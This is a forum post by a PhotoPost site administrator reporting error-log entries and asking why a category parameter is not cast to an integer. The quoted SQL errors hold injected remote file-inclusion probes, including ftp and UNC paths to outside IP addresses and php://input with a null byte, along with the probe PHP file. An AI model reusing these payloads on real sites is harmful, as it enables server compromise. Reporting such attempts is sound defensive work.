[flat]

Hi,

I got today some error reports in my mails from photopost...
Here is one of the report :

Quote:

An error was encountered during execution of the query:

SELECT id, bigimage, cat, storecat, height, width FROM pp_photos WHERE approved=1 AND userid=5918 AND cat=//195.209.41.200/folder/info.txt ORDER BY date DESC LIMIT 1 [...]

Why is it possible to put text instead of the cat id number, in that MySQL query ? Shouldn't it be casted to (int) before been used into the query ?

I got a few different reports too, which prove that the guy was trying to do bad things with photopost :

Quote:

An error was encountered during execution of the query:

SELECT id, bigimage, cat, storecat, height, width FROM pp_photos WHERE approved=1 AND userid=2282 AND cat=//195.209.41.200/folder/info.txt ORDER BY date DESC LIMIT 1

Quote:

An error was encountered during execution of the query:

SELECT id, bigimage, cat, storecat, height, width FROM pp_photos WHERE approved=1 AND userid=2282 AND cat=ftps://195.137.160.66/info.txt ORDER BY date DESC LIMIT 1

Quote:

An error was encountered during execution of the query:

SELECT id, bigimage, cat, storecat, height, width FROM pp_photos WHERE approved=1 AND userid=8771 AND cat=ftp://195.137.160.66/info.txt ORDER BY date DESC LIMIT 1

Quote:

An error was encountered during execution of the query:

SELECT id, bigimage, cat, storecat, height, width FROM pp_photos WHERE approved=1 AND userid=5918 AND cat=php://input\0 ORDER BY date DESC LIMIT 1

Quote:

An error was encountered during execution of the query:

SELECT id, bigimage, cat, storecat, height, width FROM pp_photos WHERE approved=1 AND userid=2099 AND cat=//195.209.41.200/folder/info.txt\0 ORDER BY date DESC LIMIT 1

On (russian server...), we can read the following content :

Quote:

<?
echo(md5("neverdoharm"));
exit;
die;
?>